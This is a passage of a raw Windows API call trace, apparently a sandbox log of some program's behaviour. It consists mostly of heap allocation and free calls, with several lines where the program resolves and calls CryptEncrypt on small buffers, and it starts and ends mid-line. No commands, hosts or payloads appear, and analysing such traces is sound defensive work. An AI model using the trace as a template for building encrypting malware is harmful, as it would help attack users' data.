(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0165.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0165.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0165.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0165.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0165.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0165.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0165.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0165.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0165.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0165.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0165.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0165.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0165.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0165.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0165.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0165.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0165.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0165.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0165.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0165.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0165.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0165.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0165.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0165.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0165.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0165.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0165.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0165.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0165.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0165.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a3068 | out: hHeap=0x25c0000) returned 1 [0165.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0165.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0165.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0165.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0165.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0165.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.630] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0165.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0165.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0165.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0165.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0165.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0165.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0165.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0165.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0165.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0165.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa2e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0165.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0165.632] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0165.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0165.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0165.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0165.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0165.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0165.633] CryptEncrypt (in: hKey=0xaa5660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x802, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x808) returned 1 [0165.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0165.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0165.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0165.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0165.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0165.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0165.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0165.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0165.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0165.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0165.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0165.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0165.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0165.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0165.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0165.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0165.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0165.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0165.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0165.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0165.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0165.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0165.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0165.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0165.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0165.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0165.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0165.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0165.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0165.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0165.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0165.635] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.635] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.635] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.635] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.635] CharLowerBuffW (in: lpsz="byte[2056]", cchLength=0xa | out: lpsz="byte[2056]") returned 0xa [0165.635] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.635] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.636] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.636] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0165.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0165.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0165.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0165.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0165.636] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.636] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.636] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0165.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0165.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0165.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0165.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0165.636] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0165.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0165.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0165.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0165.637] CryptEncrypt (in: hKey=0xaa5660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34a3288*, pdwDataLen=0x8bef68*=0x802, dwBufLen=0x808 | out: pbData=0x34a3288*, pdwDataLen=0x8bef68*=0x808) returned 1 [0165.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416a80 [0165.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0165.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0165.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0165.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0165.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0165.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0165.637] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0165.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0165.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0165.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0165.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0160 [0165.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0165.638] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.638] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0165.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0165.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0165.638] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0165.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0165.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 